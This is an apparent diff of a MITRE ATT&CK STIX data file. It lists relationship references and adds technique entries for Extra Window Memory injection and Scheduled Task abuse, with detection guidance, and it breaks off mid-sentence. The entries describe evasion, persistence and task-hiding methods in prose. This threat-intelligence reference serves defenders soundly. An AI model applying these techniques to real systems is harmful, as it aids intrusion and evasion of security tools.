"object_modified": "2024-07-02T13:55:55.765Z" + }, + { + "object_ref": "relationship--f7444f78-c852-4aff-8065-373c306db9b2", + "object_modified": "2024-07-02T13:55:55.760Z" + }, + { + "object_ref": "relationship--f756727d-bf9c-45eb-9401-e1659649a716", + "object_modified": "2024-07-02T13:55:55.770Z" + }, + { + "object_ref": "relationship--f77a4a40-e463-4465-ab6d-9b2d9271625b", + "object_modified": "2024-07-02T13:55:55.752Z" + }, + { + "object_ref": "relationship--f77e6db1-ef46-4ff9-8947-803a45e30667", + "object_modified": "2024-07-02T13:55:55.758Z" + }, + { + "object_ref": "relationship--f7a11ad8-80ac-4b0e-8749-102958f57f62", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--f7b8ef19-94d4-46a2-9fcc-25503d324366", + "object_modified": "2024-05-28T03:39:08.920Z" + }, + { + "object_ref": "relationship--f7bdbc1f-d08c-48a0-a474-a79b91526138", + "object_modified": "2023-09-28T20:31:31.498Z" + }, + { + "object_ref": "relationship--f7c67c9d-3a7c-4372-a480-14ff4b04e000", + "object_modified": "2024-07-02T13:55:55.758Z" + }, + { + "object_ref": "relationship--f7d672f6-993b-4036-961d-f6e22e94446c", + "object_modified": "2024-04-09T20:48:30.734Z" + }, + { + "object_ref": "relationship--f80313e6-0c5e-4dfe-8c58-fdfd1b9994dd", + "object_modified": "2024-06-21T14:12:20.256Z" + }, + { + "object_ref": "relationship--f8057de8-491f-40ad-b2aa-50d6ad4ecde0", + "object_modified": "2024-06-21T14:12:20.256Z" + }, + { + "object_ref": "relationship--f82277ac-8796-4034-a326-4d1433f4bd5f", + "object_modified": "2024-07-02T13:55:55.750Z" + }, + { + "object_ref": "relationship--f823cffe-1f48-499e-a7b9-58f12e0b95b4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--f829c482-2ab8-4a8e-a7b4-390fc8f476c4", + "object_modified": "2024-07-02T13:55:55.763Z" + }, + { + "object_ref": "relationship--f82b5246-b3ed-4d54-b85b-36b7f3fc7b37", + "object_modified": "2024-07-02T13:55:55.757Z" + }, + { + "object_ref": "relationship--f8456c9b-a4a5-4f13-94e3-54c787b21089", + "object_modified": "2023-09-28T20:16:40.519Z" + }, + { + "object_ref": "relationship--f85346e8-80c1-4078-8c1f-e5bcc4c533b6", + "object_modified": "2024-07-02T13:55:55.761Z" + }, + { + "object_ref": "relationship--f86ed9dd-6587-462a-b309-3b8158271ff2", + "object_modified": "2024-07-02T13:55:55.762Z" + }, + { + "object_ref": "relationship--f89da5b1-4513-43d1-b01c-8eafc6ea2201", + "object_modified": "2024-07-02T13:55:55.755Z" + }, + { + "object_ref": "relationship--f8aaf144-17a2-41b5-b723-a80cb43a8c75", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--f8adc0cb-dafa-40c8-acff-4dc6fc213477", + "object_modified": "2024-07-02T13:55:55.754Z" + }, + { + "object_ref": "relationship--f8b5abf2-0569-4ee2-b39b-7ffc84792c26", + "object_modified": "2024-06-21T14:12:20.273Z" + }, + { + "object_ref": "relationship--f8b73155-d3fb-41d8-8ec9-d8f2a01d2458", + "object_modified": "2024-07-02T13:55:55.748Z" + }, + { + "object_ref": "relationship--f8c320cc-97f5-4b3a-8847-92c42b6a48b7", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--f8f57cb0-11c1-48ac-8d29-00c8a99db4e1", + "object_modified": "2024-07-02T13:55:55.764Z" + }, + { + "object_ref": "relationship--f901ad15-19d4-47ac-92d4-90d54f21c6ef", + "object_modified": "2024-07-02T13:55:55.750Z" + }, + { + "object_ref": "relationship--f91d8791-5d79-4d41-83db-54b3e1edc657", + "object_modified": "2024-07-02T13:55:55.752Z" + }, + { + "object_ref": "relationship--f92764db-a880-4726-9d28-a035170f790c", + "object_modified": "2023-09-28T21:22:35.236Z" + }, + { + "object_ref": "relationship--f94410e3-ff8c-4538-83b6-c666e33d2327", + "object_modified": "2024-07-02T13:55:55.769Z" + }, + { + "object_ref": "relationship--f9672583-d9a4-46d2-8cde-09c1af4284c7", + "object_modified": "2024-07-02T13:55:55.756Z" + }, + { + "object_ref": "relationship--f9682e28-c32e-4aa1-a1aa-647306a78930", + "object_modified": "2024-07-02T13:55:55.756Z" + }, + { + "object_ref": "relationship--f96dd8b2-6b49-4a64-a867-a571a9c0016e", + "object_modified": "2024-05-28T03:39:45.734Z" + }, + { + "object_ref": "relationship--f97352ba-1e93-4496-84d7-d8b330022635", + "object_modified": "2024-06-21T14:12:20.256Z" + }, + { + "object_ref": "relationship--f9820b56-ce35-481e-9044-c7b52e806ff5", + "object_modified": "2024-06-21T14:12:20.264Z" + }, + { + "object_ref": "relationship--f983035d-8095-44b3-9e85-85b62f19430e", + "object_modified": "2024-07-02T13:55:55.766Z" + }, + { + "object_ref": "relationship--f9867ca2-18a1-4e84-ad1d-61d7c85fe4b3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--f9907fb1-976b-4f51-ac13-b45f2ff9452b", + "object_modified": "2023-09-28T19:48:37.072Z" + }, + { + "object_ref": "relationship--f995ebc4-665b-4628-a902-a6dd98aceb9b", + "object_modified": "2024-07-02T13:55:55.748Z" + }, + { + "object_ref": "relationship--f9b97ad8-22eb-47d6-8844-62535f857fa9", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--f9cbb048-3213-48dc-a5d7-3c6008fc18ad", + "object_modified": "2024-07-02T13:55:55.772Z" + }, + { + "object_ref": "relationship--f9d6ebe5-ace1-41ab-8bdc-9682b3d99364", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--f9eb0bcb-1d22-437d-b02d-495c62e87425", + "object_modified": "2024-06-21T14:12:20.258Z" + }, + { + "object_ref": "relationship--f9fb683f-ee80-42cd-980a-872a28db789e", + "object_modified": "2024-07-02T13:55:55.760Z" + }, + { + "object_ref": "relationship--fa031084-d847-43ed-8fb3-ff59446b2cb7", + "object_modified": "2024-07-02T13:55:55.770Z" + }, + { + "object_ref": "relationship--fa045626-38ff-495b-a890-894426b20d75", + "object_modified": "2024-07-02T13:55:55.768Z" + }, + { + "object_ref": "relationship--fa1d441c-8358-4969-899a-a30e63d92e74", + "object_modified": "2024-07-02T13:55:55.763Z" + }, + { + "object_ref": "relationship--fa34ced0-9f96-46e2-981c-05d19ac3e9ea", + "object_modified": "2024-06-25T13:20:28.866Z" + }, + { + "object_ref": "relationship--fa41cf1f-759f-4cbe-a705-bb50bb53f88a", + "object_modified": "2024-07-02T13:55:55.760Z" + }, + { + "object_ref": "relationship--fa445f10-fb1c-4911-8829-cf1d7d3abc38", + "object_modified": "2024-07-02T13:55:55.761Z" + }, + { + "object_ref": "relationship--fa4f1259-7eb7-4f98-9443-eee261ea29aa", + "object_modified": "2024-07-02T13:55:55.761Z" + }, + { + "object_ref": "relationship--fa685d16-57dd-4d23-8856-8f446377904b", + "object_modified": "2024-07-02T13:55:55.759Z" + }, + { + "object_ref": "relationship--fa6c989c-edfa-4084-af10-566f42a999e9", + "object_modified": "2024-07-02T13:55:55.748Z" + }, + { + "object_ref": "relationship--fa7600a8-389c-436e-a27a-ff4a52a410ee", + "object_modified": "2024-07-02T13:55:55.772Z" + }, + { + "object_ref": "relationship--faa59a4c-3f60-450a-bbb3-0d01ae856cab", + "object_modified": "2024-06-21T14:12:20.272Z" + }, + { + "object_ref": "relationship--fac4bc88-af9b-4eec-b041-e4138b49c3c0", + "object_modified": "2023-09-29T16:28:04.180Z" + }, + { + "object_ref": "relationship--fadbdca3-3c98-497c-a156-e53b89664359", + "object_modified": "2023-09-28T20:16:55.038Z" + }, + { + "object_ref": "relationship--fadf76e8-63b2-4d69-ba36-e85af1354a67", + "object_modified": "2024-07-02T13:55:55.756Z" + }, + { + "object_ref": "relationship--fae76637-73a8-4543-b899-91a481cd8d90", + "object_modified": "2024-07-02T13:55:55.772Z" + }, + { + "object_ref": "relationship--faebff10-e4a5-4651-9d20-6f6764653c22", + "object_modified": "2024-07-02T13:55:55.771Z" + }, + { + "object_ref": "relationship--faf05d31-b045-4a02-8800-e43f14cf002c", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--fb264d1a-8177-4c42-8e8f-abe2016b39b9", + "object_modified": "2024-06-26T19:29:38.364Z" + }, + { + "object_ref": "relationship--fb31d542-7699-4942-a8f2-12b0bd21db20", + "object_modified": "2024-06-21T14:12:20.256Z" + }, + { + "object_ref": "relationship--fb4cc3ac-3f3b-48bb-ba32-5d86c7bcb967", + "object_modified": "2024-06-21T14:12:20.273Z" + }, + { + "object_ref": "relationship--fb4f3b46-9e6a-477b-b739-4388d4742bcd", + "object_modified": "2024-07-02T13:55:55.754Z" + }, + { + "object_ref": "relationship--fb561d57-f1e4-4d4c-be67-198a530b3643", + "object_modified": "2024-07-02T13:55:55.752Z" + }, + { + "object_ref": "relationship--fb64523c-3acd-49ea-834f-bb99202160cc", + "object_modified": "2024-06-21T14:12:20.261Z" + }, + { + "object_ref": "relationship--fb7019c5-1ec2-45a3-8122-fe68d4b41682", + "object_modified": "2024-06-21T14:12:20.271Z" + }, + { + "object_ref": "relationship--fb7415cd-a6a0-4915-afe0-86fcaa6deb8a", + "object_modified": "2024-06-21T14:12:20.264Z" + }, + { + "object_ref": "relationship--fb82f6d3-0e6b-4fa5-a54a-f7deb28f8324", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fb8643d1-a377-4ad7-95fe-e12a0eb05b1d", + "object_modified": "2024-06-21T14:12:20.262Z" + }, + { + "object_ref": "relationship--fbb14545-3333-4619-86bd-d9e1c962a759", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--fbbb8233-568b-4437-ac8e-ba1ba974d426", + "object_modified": "2024-07-02T13:55:55.752Z" + }, + { + "object_ref": "relationship--fbf0263d-5f95-4fbd-982f-cdca9beb5fab", + "object_modified": "2024-06-21T14:12:20.277Z" + }, + { + "object_ref": "relationship--fbfa9e5f-bf20-40da-a957-c1066f4f6032", + "object_modified": "2024-07-02T13:55:55.762Z" + }, + { + "object_ref": "relationship--fc123d2e-3cd6-4d14-929c-8eb9c9a7cdd2", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fc163c39-5d4c-463d-92d3-abedb59b5aca", + "object_modified": "2024-07-02T13:55:55.769Z" + }, + { + "object_ref": "relationship--fc189fa0-1235-46ac-a802-f226dc0ec4e1", + "object_modified": "2023-09-29T17:38:28.664Z" + }, + { + "object_ref": "relationship--fc26d209-c7fb-4d59-82da-0be7c72c651d", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fc484248-b190-4219-af65-41043ecfdb33", + "object_modified": "2024-07-02T13:55:55.749Z" + }, + { + "object_ref": "relationship--fc787de3-8a82-43f6-b649-f01a7006be54", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fc8ba7e4-5e1b-4b17-8d80-2ae6e7bb37d2", + "object_modified": "2024-07-02T13:55:55.772Z" + }, + { + "object_ref": "relationship--fc932929-5324-4bcd-afac-a6c812d14438", + "object_modified": "2024-07-02T13:55:55.763Z" + }, + { + "object_ref": "relationship--fca5a1c7-8548-4621-97b5-023572344ae4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fcb573cd-8e00-4fc4-bbd3-3cf9746b1fa7", + "object_modified": "2024-07-02T13:55:55.766Z" + }, + { + "object_ref": "relationship--fcba6a58-72b0-4d54-a887-740624e22f6f", + "object_modified": "2024-03-26T15:42:36.840Z" + }, + { + "object_ref": "relationship--fcc47ea4-e7bf-4d33-8601-f2fe47d2021e", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fcd6fb59-f613-4248-9fd2-e1012fb07d60", + "object_modified": "2024-07-02T13:55:55.750Z" + }, + { + "object_ref": "relationship--fcdcb31d-2e52-43f4-a883-c60325a13075", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fce6611e-54c4-4904-9c3c-562c74201067", + "object_modified": "2024-07-02T13:55:55.769Z" + }, + { + "object_ref": "relationship--fcf64c2c-2a09-4afe-a670-9412d4cc6d52", + "object_modified": "2024-07-02T13:55:55.768Z" + }, + { + "object_ref": "relationship--fcfa67b5-03dc-4d92-bc34-0f483d48bc6a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fd0f8739-6b4a-4b08-aa25-55fda2c0a21d", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--fd25bfb9-8a77-4213-ad36-e751c50f50e8", + "object_modified": "2024-07-02T13:55:55.751Z" + }, + { + "object_ref": "relationship--fd309395-8fcc-402c-9227-90ac897fd602", + "object_modified": "2024-03-26T15:41:39.905Z" + }, + { + "object_ref": "relationship--fd31c763-8e36-4f6f-9238-fed081b524b3", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fd34a972-0b7e-4ac2-ba5b-c1ffb0d9ff7d", + "object_modified": "2024-07-02T13:55:55.756Z" + }, + { + "object_ref": "relationship--fd375cf3-8695-4a45-ac30-efc239e19e4d", + "object_modified": "2024-07-02T13:55:55.769Z" + }, + { + "object_ref": "relationship--fd3ba994-75a3-4b1e-bfea-8e36b9a07015", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fd3bc308-82cd-49c9-a41e-9b19ce04b3cd", + "object_modified": "2023-10-02T20:23:41.227Z" + }, + { + "object_ref": "relationship--fd44a14f-1ca5-4356-a6fe-c5507a77d490", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fd498c11-2b76-45fb-9d61-d7051a6469fc", + "object_modified": "2024-06-27T08:53:37.614Z" + }, + { + "object_ref": "relationship--fd6bf9df-13e5-4864-a5ee-5703b660b361", + "object_modified": "2024-07-02T13:55:55.753Z" + }, + { + "object_ref": "relationship--fd7ca8e8-82fc-443d-945a-fcef3352ec8a", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fd89cfaa-c5d5-416f-affb-6c1f68e63dd5", + "object_modified": "2024-07-02T13:55:55.770Z" + }, + { + "object_ref": "relationship--fd8aff13-4514-48ad-9663-df65d7fb2b29", + "object_modified": "2024-07-02T13:55:55.748Z" + }, + { + "object_ref": "relationship--fdae82cc-ec31-4590-8d13-19e6cc2f2946", + "object_modified": "2024-06-26T14:23:50.428Z" + }, + { + "object_ref": "relationship--fdb054f1-0446-4af0-b11c-790fbf352014", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fdc20415-c9a1-405e-80af-3d297894e8fa", + "object_modified": "2023-09-28T19:58:30.849Z" + }, + { + "object_ref": "relationship--fdd2bb3a-f6bb-48b1-bb6b-78ac329eddcf", + "object_modified": "2024-07-02T13:55:55.767Z" + }, + { + "object_ref": "relationship--fde1057f-e72f-4c19-a8c4-20378233b5e9", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--fdf1ffae-adfd-4140-82c2-2f982b0c43af", + "object_modified": "2024-07-02T13:55:55.764Z" + }, + { + "object_ref": "relationship--fe01d6f6-236d-4f2a-8601-36204c8b89f4", + "object_modified": "2024-07-02T13:55:55.748Z" + }, + { + "object_ref": "relationship--fe061ca4-3182-49b7-a70c-96c58e19d9bc", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fe22f626-ddf3-4d5e-97d1-058878d7830f", + "object_modified": "2023-09-28T21:10:39.025Z" + }, + { + "object_ref": "relationship--fe265dd7-2c1a-4c75-8aa8-12d0c82c7926", + "object_modified": "2023-09-28T21:26:59.998Z" + }, + { + "object_ref": "relationship--fe30d6f7-f03d-4af2-a9da-ac1f422a100e", + "object_modified": "2024-07-02T13:55:55.762Z" + }, + { + "object_ref": "relationship--fe538c59-703a-4e04-8bde-64d192db8bdd", + "object_modified": "2024-05-28T03:42:15.910Z" + }, + { + "object_ref": "relationship--fe81b980-bfcd-4baa-a2ff-196327f2ac58", + "object_modified": "2024-06-21T14:12:20.257Z" + }, + { + "object_ref": "relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fe9d5067-d307-4e9e-98b7-c08b33645983", + "object_modified": "2024-07-02T13:55:55.753Z" + }, + { + "object_ref": "relationship--feaa845f-b860-45ab-beaf-e92bcca92876", + "object_modified": "2024-07-02T13:55:55.767Z" + }, + { + "object_ref": "relationship--feb5c75b-6c19-48fa-aa49-f2796ae96905", + "object_modified": "2024-05-28T03:40:57.156Z" + }, + { + "object_ref": "relationship--febaa044-5467-4393-bd13-2d096be02cf4", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--febc1930-94af-46c3-8633-28f896555ff0", + "object_modified": "2024-06-21T14:12:20.266Z" + }, + { + "object_ref": "relationship--feccce31-b855-430b-a0f6-6e3a3eb41bf9", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--fed4bc60-8a26-4c21-a913-63144eb991da", + "object_modified": "2024-07-02T13:55:55.751Z" + }, + { + "object_ref": "relationship--feef9475-6694-4cbe-84b2-43c6a8e6257d", + "object_modified": "2024-07-02T13:55:55.765Z" + }, + { + "object_ref": "relationship--fef113c8-f287-4176-b21c-6c153b715b29", + "object_modified": "2024-07-02T13:55:55.753Z" + }, + { + "object_ref": "relationship--ff021e27-63be-41f4-bc4d-2ce75d8a3ecb", + "object_modified": "2023-09-28T19:56:26.241Z" + }, + { + "object_ref": "relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--ff107632-751b-4efb-86bd-af670b48d35d", + "object_modified": "2023-09-28T21:21:30.387Z" + }, + { + "object_ref": "relationship--ff11787d-6290-454a-9caf-9288de6c01f0", + "object_modified": "2024-07-02T13:55:55.771Z" + }, + { + "object_ref": "relationship--ff171c46-cbf0-4b24-a4d3-db15df1d88f2", + "object_modified": "2024-07-02T13:55:55.768Z" + }, + { + "object_ref": "relationship--ff2155fa-714d-4d99-a610-91ceb5f049ef", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "relationship--ff38c15c-1d1f-4095-8da6-e2709a79d84a", + "object_modified": "2024-07-02T13:55:55.768Z" + }, + { + "object_ref": "relationship--ff735817-537a-411c-827f-8f5fbdd296c6", + "object_modified": "2024-06-21T14:12:20.255Z" + }, + { + "object_ref": "relationship--ff7a34c8-adeb-4f1d-904d-e41355d8b7d6", + "object_modified": "2024-07-02T13:55:55.754Z" + }, + { + "object_ref": "relationship--ff847291-0fdb-4e3e-85ea-81b5618d9a86", + "object_modified": "2024-07-02T13:55:55.758Z" + }, + { + "object_ref": "relationship--ff8aa165-9bf6-4735-8848-c2e529c5a210", + "object_modified": "2024-06-26T11:55:01.411Z" + }, + { + "object_ref": "relationship--ff8bf24d-16ed-4f45-84f1-abc2dbcc7c65", + "object_modified": "2024-07-02T13:55:55.754Z" + }, + { + "object_ref": "relationship--ff90f6fd-da97-4be6-a99d-efaba9fdf508", + "object_modified": "2024-06-27T08:55:41.516Z" + }, + { + "object_ref": "relationship--ff926e60-3e81-40fc-a804-86af63207c89", + "object_modified": "2024-06-21T14:12:20.259Z" + }, + { + "object_ref": "relationship--ff99df76-7e63-4162-b27e-95c6bed9a251", + "object_modified": "2024-07-02T13:55:55.755Z" + }, + { + "object_ref": "relationship--ffaf12af-7f0f-450e-b461-6eb3b26d0acc", + "object_modified": "2024-07-02T13:55:55.769Z" + }, + { + "object_ref": "relationship--ffb5d378-3985-48c1-9ad4-3542aa6eeeac", + "object_modified": "2024-06-27T09:02:38.125Z" + }, + { + "object_ref": "relationship--ffc224ed-0a20-435a-b145-4df111b09a37", + "object_modified": "2024-07-02T13:55:55.765Z" + }, + { + "object_ref": "relationship--ffd69fbd-738f-4025-8f99-cfe13dcf6769", + "object_modified": "2024-06-26T13:50:18.323Z" + }, + { + "object_ref": "relationship--ffea22f5-2758-4e94-a00e-bfd8696ce2db", + "object_modified": "2024-07-02T13:55:55.763Z" + }, + { + "object_ref": "relationship--fff40673-b638-4695-9054-bab46559c992", + "object_modified": "2024-07-02T13:55:55.752Z" + }, + { + "object_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_modified": "2022-04-25T14:00:00.188Z" + }, + { + "object_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "object_modified": "2023-09-27T15:31:28.155Z" + }, + { + "object_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "object_modified": "2024-06-24T11:37:06.994Z" + }, + { + "object_ref": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "object_modified": "2024-07-02T18:02:05.403Z" + } + ], + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "type": "x-mitre-collection", + "spec_version": "2.1", + "id": "x-mitre-collection--6faf6ddd-fc46-461a-b633-d275b3bbd2c1", + "created": "2024-07-02T18:02:13.377Z", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "x_mitre_domains": [], + "x_mitre_attack_spec_version": "3.2.0", + "created_by_ref": "identity--affd1ce5-a993-462a-b7b9-4b5d7b305b0f", + "x_mitre_modified_by_ref": "identity--affd1ce5-a993-462a-b7b9-4b5d7b305b0f" + }, + { + "modified": "2024-05-21T16:23:41.133Z", + "name": "Extra Window Memory Injection", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ], + "x_mitre_effective_permissions": [], + "x_mitre_permissions_required": [], + "x_mitre_system_requirements": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "created": "2020-01-14T17:18:32.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/011", + "external_id": "T1055.011" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "MalwareTech Power Loader Aug 2013", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.", + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html" + }, + { + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + }, + { + "source_name": "Microsoft Window Classes", + "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx" + }, + { + "source_name": "Microsoft GetWindowLong function", + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" + }, + { + "source_name": "Microsoft SendNotifyMessage function", + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" + }, + { + "source_name": "Microsoft SetWindowLong function", + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-11-15T14:33:53.354Z", + "name": "Scheduled Task", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Andrew Northern, @ex_raritas", + "Bryan Campbell, @bry_campbell", + "Zachary Abzug, @ZackDoesML", + "Selena Larson, @selenalarson", + "Sittikorn Sangrattanapitak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing 